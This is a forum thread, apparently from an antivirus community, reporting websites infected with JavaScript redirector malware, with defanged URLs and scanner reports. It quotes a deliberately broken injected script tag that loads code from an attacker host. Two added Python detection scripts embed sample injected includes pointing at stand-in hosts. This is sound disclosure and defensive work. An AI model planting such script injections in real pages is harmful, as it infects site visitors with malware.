Source of infection...

Hi malware fighters,

The following site is a redirect for infection of the site mentioned below: http://www.UnmaskParasites.com/security-report/?page=n9uo.com
403. Forbidden

http://safeweb.norton.com/report/show?url=grantsalert.com%2F&x=10&y=8
What is there: Total threats on this site: 38 all instances of Trojan.Malscript!html
Of the 105 pages we tested on the site over the past 90 days, 88 pages resulted in malicious software being downloaded and installed without user consent, and the last time suspicious content was found on this site was on 2010-05-13.

Malicious software includes 91 scripting exploits. Successful infection resulted in an average of 2 new processes on the target machine.

Malicious software is hosted on 2 domain(s), including n9uocom/, sio3cn/.
See: http://safeweb.norton.com/report/show?url=sio3.cn&x=0&y=0
http://jsunpack.jeek.org/dec/go?report=61cfc9179bfe18905d4daa6a25cac414df04c50c

1 domain appears to be functioning as an intermediary for distributing malware to visitors of this site, including holeinone*com.tw/,

polonus

Hi malware fighters,

Similar malcode also detected here:

Threat Name: Trojan.Malscript!html
Location: htxp://www.fear-crew-team.yoyo.pl/eacbdf/kmartemploymentapplications.html

Threat Name: Trojan.Malscript!html
Location: htxp://www.fear-crew-team.yoyo.pl/eacbdf/americanpageanttest.html

Threat Name: Trojan.Malscript!html
Location: htxp://www.fear-crew-team.yoyo.pl/eacbdf/taperfadehaircuts.html

Threat Name: Trojan.Malscript!html
Location: htxp://www.fear-crew-team.yoyo.pl/eacbdf/dibujosdepreciousmomentsparapintar.html

Threat Name: Trojan.Malscript!html
Location: htxp://www.fear-crew-team.yoyo.pl/eacbdf/mydisholivegardennetwork.html

Threat Name: Trojan.Malscript!html
Location: htxp://www.fear-crew-team.yoyo.pl/eacbdf/graffitidrawingletter.html

Threat Name: Trojan.Malscript!html
Location: htxp://www.fear-crew-team.yoyo.pl/eacbdf/picturesofeastcoastryders.html

Threat Name: Trojan.Malscript!html
Location: htxp://www.fear-crew-team.yoyo.pl/eacbdf/picturesofbraids.html

Threat Name: Trojan.Malscript!html
Location: htxp://www.fear-crew-team.yoyo.pl/eacbdf/trillfamadioslyrics.html

Threat Name: Trojan.Malscript!html
Location: htxp://www.fear-crew-team.yoyo.pl/eacbdf/myspaceoverlayeditors.html

Description here: htxp://traversecode.com/2009/12/29/trojan-malscripthtml/ (Is flagged by avast shield)

Avast detects this as: JS:Redirector-B (trj)

and an additional suspicious link found here: sexfunbeach.com suspicious - displaying 1 of 1

* <Script> link - htxp://sexfunbeach.com/blogs/moms/wp-content/plugins/index.php
Malicious software includes 42 exploit(s), 19 trojan(s), 6 scripting exploit(s).

Malicious software is hosted on 3 domains, including traffloads.in/, asfirey.net/, gumblar.cn/.

This site was hosted on 1 network(s) including AS6428 (CDM).

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past sexfunbeach.com appeared to function as an intermediary for the infection of 6 sites including savemyporn.com/, siscon.com.br/, smutboxxx.com/.

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 38 domain(s), including savemyporn.com/, smutboxxx.com/, sp-plan.co.jp/.

The nature of the content of these sites is almost a guarantee of added malware,
so stay away from / steer clear of pr0n sites,

polonus

VirusTotal - kmartemploymentapplications.html - 19/41
http://www.virustotal.com/analisis/ddfc3f3f242af192a2ef144bd994fa20948a75c44ce9a02ee5c2e08cb77d3867-1276555748

VirusTotal - trojan-malscripthtml.htm - 6/40
http://www.virustotal.com/analisis/e0d515af6d53831a794995b530846986894666afcc5cdf6be32cf06c3025edfd-1276555971

VirusTotal - index.php - 15/41
http://www.virustotal.com/analisis/fc74a7e9494ca42a36e867e8070a6b3377938e923e8f197997eb85d5aa4f0f82-1276556360

Another site with this malware found:

Threat Name: Trojan.Malscript!html
Location: htxp://astoncartersolicitors.com/

Threat Name: Trojan.Malscript!html
Location: htxp://astoncartersolicitors.com/index.html

Blocked by finjan: see the alert given attached/ShowBlock.aspx?transid=4C16F4ED

polonus

VirusTotal - index.html - 28/41
http://www.virustotal.com/analisis/961af977b5acbe7f901ff2c7e90fe3d3938a25772ee1ad393453fc998d3d29b9-1276620205

Hi malware fighters,

Another one found here:
Threat Name: Trojan.Malscript!html
Location: hxtp://www.kindergarten-zielstrasse.de/
finjan found: JS/Redirector-u aka JS/Dropper aka Trojan-Downloader.JS.Pegel.ac A

This does not find it: http://wepawet.iseclab.org/view.php?hash=f7f4353f6be53dfe63e3a2cf00b0b46e&t=1276699724&type=js
But what is: htxp://bestdarkstar.info:8080/google.com/imeem.com/ign.com.php NXDOMAIN application/x-empty
A known Joomla exploit and appearing in this blocklist: http://doc.emergingthreats.net/pub/Main/HoneywallSamples/hosts

Hi malware fighters,

And another one here:
labradory_krakow.republika.pl
Domain Hash ad873cf7c1d8d47dbdacfa4b1815def1
IP Address 213.180.128.160
IP Hostname gwiazdka.republika.pl
IP Country PL (Poland)
AS Number 12990
AS Name ONET-PL-AS1 Onet.pl portal network
Detections 4 / 18 (22 %)
Status DANGEROUS
Threat Name: Trojan.Malscript!html
Location: htxp://labradory_krakow.republika.pl/
2 suspicious inline scripts found.
Moreover, Google currently lists this page as suspicious*
Malicious software includes 2 exploits, 1 scripting exploits, 1 trojan - Troj/Iframe/DY
HTML/Crypted.Gen aka JS/Redir.AQ
Successful infection resulted in an average of 1 new process on the target machine.

Malicious software is hosted on 7 domains, including searchfunes.org/, mobi-print.com/, adingurj.com/.

2 domains appear to be functioning as intermediaries for distributing malware to visitors of this site, including scaraori.com/, eplarine.com/.

This site was hosted on 1 network(s) including AS5617 (Polish Telecom).

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past months labradory_krakow.republika.pl appeared to function as an intermediary for the infection of 3 sites including mojpupil.pl/, labrador.toplista.pl/, hodowle.top-100.pl/,

also see WOT: http://www.mywot.com/en/scorecard/labrador.toplista.pl

Read up about the code shown as an attached image:
http://stackoverflow.com/questions/1224670/what-is-the-advantage-of-using-unescape-on-document-write-to-load-javacript

polonus
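The Stack Overflow link above asks why injected code uses unescape() inside document.write(): the percent-encoded string hides the real script tag from anyone grepping the page for "<script src". The following is an added example, not code from the post or from any of the scanners it cites. It emulates the legacy JavaScript unescape() (including %uXXXX sequences) and lists script sources that only appear after decoding; the sample page and the host obf.example.invalid are constructed for the example.

```python
import re

# unescape('...') or unescape("...") call with a string literal argument
UNESCAPE_CALL = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.S)
# %uXXXX (one UTF-16 code unit) or %XX (one byte-valued char), as JS unescape() decodes them
PCT_SEQ = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")
# src attribute of a <script> tag, quoted or bare
SCRIPT_SRC = re.compile(r"<script[^>]*\ssrc=['\"]?([^'\" >]+)", re.I)


def js_unescape(text):
    """Emulate the legacy JavaScript unescape(): decode %uXXXX and %XX, leave everything else."""
    def repl(m):
        if m.group(1):
            return chr(int(m.group(1), 16))
        return chr(int(m.group(2), 16))
    return PCT_SEQ.sub(repl, text)


def decode_unescape_writes(html):
    """Return the decoded payload of every unescape('...') literal found in the page."""
    return [js_unescape(m.group(2)) for m in UNESCAPE_CALL.finditer(html)]


def visible_script_sources(html):
    """Script src values readable directly in the page source."""
    return SCRIPT_SRC.findall(html)


def hidden_script_sources(html):
    """Script src values that only appear once unescape() payloads are decoded.

    These are the ones a plain grep for '<script src' misses and are worth a closer look.
    """
    hidden = []
    for decoded in decode_unescape_writes(html):
        for src in SCRIPT_SRC.findall(decoded):
            if src not in visible_script_sources(html):
                hidden.append(src)
    return hidden


# Constructed sample page: one plain script tag plus one hidden behind unescape()/document.write()
SAMPLE_PAGE = """<html><head>
<script src="/js/site.js"></script>
</head><body><h1>Hello</h1>
<script>document.write(unescape('%3Cscript%20src%3D%22http%3A%2F%2Fobf.example.invalid%3A8080%2Fa.js%22%3E%3C%2Fscript%3E'))</script>
</body></html>"""

if __name__ == "__main__":
    print("visible:", visible_script_sources(SAMPLE_PAGE))
    print("hidden :", hidden_script_sources(SAMPLE_PAGE))
```

Run it against a saved copy of a page rather than the live site; the decoder is static and executes nothing. A real page may nest unescape() inside eval() or split the literal across string concatenations, which this single-pass decoder does not unwrap.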

VirusTotal - kindergarten-zielstrasse.de.h - 25/41
http://www.virustotal.com/analisis/3666630390052874be3013cbaecf9310c7bcb6f2cb861520f8fb848fadd241c5-1276715747

VirusTotal - labradory_krakow.republika.pl.htm - 7/41
http://www.virustotal.com/analisis/92afaef392ff6077b74feffc6b2ddca0833680bbb05bbcb9ceea9652a64ff0a9-1276715754

Hi Pondus,

According to the second results, avast needs detection there…
But according to the statistics here, avast detection rate for the malware should be 38%:
http://lists.clean-mx.com/clean-mx/md5.php?F_Prot=JS/Redir.AQ

pol

Hi malware fighters,

And what do you think of 61 instances of it here: http://www.browserdefender.com/site/fear-crew-team.yoyo.pl/

Same trojan,

pol

Hi Pondus,

Now a Norwegian site that has this infection:
webactive24*at
Domain Hash b4a0ff422b989a8d382f1fbe8c5d2b0a
IP Address 213.188.130.108
IP Hostname linuxnl-www.active24.nl
IP Country NO (Norway)
AS Number 12994
AS Name Active ISP AS
Detections 7 / 19 (37 %)
Status DANGEROUS

Virus
Threat Name: Trojan.Malscript!html
Location: htxp://www.webactive24.at/

Drive-By Downloads
Threat Name: Trojan.Malscript!html
File name: c:\documents and settings\user\local settings\temporary internet files\content.ie5\ocieqgj3\webactive24[1].htm
Location: htxp://webactive24.at/

See the attached image of the malcode…
for lasio.ru see: http://www.google.com/safebrowsing/diagnostic?site=lasio.ru

polonus

VirusTotal - webactive24.at.htm - 28/41 ( Edit: WebSite is now CLEANED )
http://www.virustotal.com/analisis/5da6c6da967a4cb143a46ad9c27b9150e9d8435850064bc8ced16ca86d55f8ab-1276983902

Hi, another site with malscript infection found, this time a Czech site:

Threat Name: Trojan.Malscript!html
Location: hxtp://www.krach-cz.cz/index.htm
Analysis: htxp://jsunpack.jeek.org/dec/go?report=636f126aa098d95c0adaa1df68f0abfdcab909c4
Found benign here, but is infected with Troj/JSRedir-AK
http://wepawet.iseclab.org/view.php?hash=ef241bff79db6f86ab6377f253308307&t=1277643265&type=js
Location: hxtp://www.krach-cz.cz/
Our avast av detects JS-Illredir-H here,

polonus

Howdy malware fighters,

Here a list of dangerous subdomains:
http://safeweb.norton.com/report/show?url=oployau.fancountblogger.com.&x=13&y=10

sorydory.russellhowe.com. 3530 IN A 88.198.25.170
Threat Name: Bloodhound.Exploit.292
Location: htxp://sorydory.russellhowe.com:8080/Applet1.html

aospfpgy.dogplaystation.com. 2792 IN A 216.154.216.15
Threat Name: Bloodhound.Exploit.292
Location: htxp://aospfpgy.dogplaystation.com:8080/Applet1.html

kollinsoy.skyefenton.com. 399 IN A 194.150.236.199
Threat Name: Trojan.Malscript!html
Location: hxtp://kollinsoy.skyefenton.com:8080/HDMI.js

temp.hbsouthmomsclub.com. 1116 IN A 81.89.109.23
Threat Name: Trojan.Malscript!html
Location: htxp://temp.hbsouthmomsclub.com:8080/Notes1.pdf

The attack itself is nothing new. It uses stolen FTP credentials to inject malicious scripts into legitimate web pages. The injected scripts look like this:

 ^sc ript type="text/javascript" src="hxxp://oployau .fancountblogger .com:8080/YouTube*js"^^/sc ript^
<!--8469f3ebb36bebb12b39b0f9e7fe5933--^ code broken by me, pol

polonus
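The injected tag quoted above has a recognisable shape: an external script on port 8080 followed by a comment containing a 32-character hex marker. Below is an added example, not code from the post or from any of the tools it links, of a check a site owner could run over a local copy of their web root after a compromise like this. It flags script tags whose host is not one of the site's own and which either use a non-standard port or are followed by such a marker comment. The sample page and the host oployau.example.invalid are constructed; the marker value is the one quoted in the post.

```python
import os
import re
from urllib.parse import urlsplit

# A <script ... src=...></script>, optionally followed by a <!--32 hex chars--> marker
INJECTED = re.compile(
    r"<script[^>]*\ssrc=['\"]?(?P<src>[^'\" >]+)[^>]*>\s*</script>\s*"
    r"(?P<marker><!--[0-9a-f]{32}-->)?",
    re.I,
)

WEB_EXTENSIONS = (".html", ".htm", ".php", ".js")


def find_injections(html, own_hosts):
    """Return suspicious external script includes found in one page.

    own_hosts: set of hostnames the site legitimately serves scripts from.
    Each finding records the src, the 1-based line it starts on, and why it was flagged.
    """
    findings = []
    for m in INJECTED.finditer(html):
        src = m.group("src")
        parts = urlsplit(src)
        # relative paths and same-site hosts are normal; skip them
        if parts.hostname is None or parts.hostname.lower() in own_hosts:
            continue
        reasons = []
        try:
            port = parts.port
        except ValueError:
            port = None
        if port not in (None, 80, 443):
            reasons.append(f"non-standard port {port}")
        if m.group("marker"):
            reasons.append("32-hex marker comment after tag")
        if reasons:
            line = html[: m.start()].count("\n") + 1
            findings.append({"src": src, "line": line, "reasons": reasons})
    return findings


def scan_webroot(root, own_hosts):
    """Walk a local web root and collect findings per file."""
    results = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(WEB_EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = find_injections(fh.read(), own_hosts)
            if hits:
                results[path] = hits
    return results


# Constructed sample: a CDN script and a relative script (both fine) plus one injected tag
SAMPLE_PAGE = """<html><head>
<script src="https://cdn.example.invalid/jquery.min.js"></script>
<script src="/js/site.js"></script>
</head><body>
<p>Legitimate content</p>
<script type="text/javascript" src="http://oployau.example.invalid:8080/YouTube.js"></script>
<!--8469f3ebb36bebb12b39b0f9e7fe5933-->
</body></html>"""

if __name__ == "__main__":
    for hit in find_injections(SAMPLE_PAGE, {"www.example.invalid"}):
        print(f"line {hit['line']}: {hit['src']} ({', '.join(hit['reasons'])})")
```

Because the post says the injection came through stolen FTP credentials, cleaning the files is only half the job: the credentials must be rotated and the machine that held them checked, otherwise the tag comes back on the next upload.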

Hi malware fighters,

Another one: Threats found: 1
Here is a complete list:
Threat Name: Trojan.Malscript!html
Location: htxp://ee9kd.smartenergymodel.com/js/jquery.min.js
The last time suspicious content was found on this site was on 2010-07-08.
Malicious software includes 4 trojans, 4 exploits

This site was hosted on 2 network(s) including AS27473 (CIHOST), AS16276 (OVH).

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, smartenergymodel.com appeared to function as an intermediary for the infection of 25 sites including joby.cz/, cherokeestreetnews.org/, dixiequicks.com/.

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 932 domains, including prettymematernity.com/, balioutbound.com/, turkescort.gen.tr/.

How did this happen?

In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message,

polonus

only avast / Gdata have this

VirusTotal - jquery.min.js - 3/41
http://www.virustotal.com/analisis/f1c31d922ec1d2a7b257d6a012a773f5392021f01c89c4855f4787e865d97757-1278621328

Hi Pondus,

That is a sign they are attentive ;D

pol

Hi Pondus,

Thanks for making that Norwegian site safe for the users: http://forum.avast.com/index.php?topic=60161.msg514256#msg514256
All on the Internet should be grateful for such efforts,

your co-malware-fighter,

polonus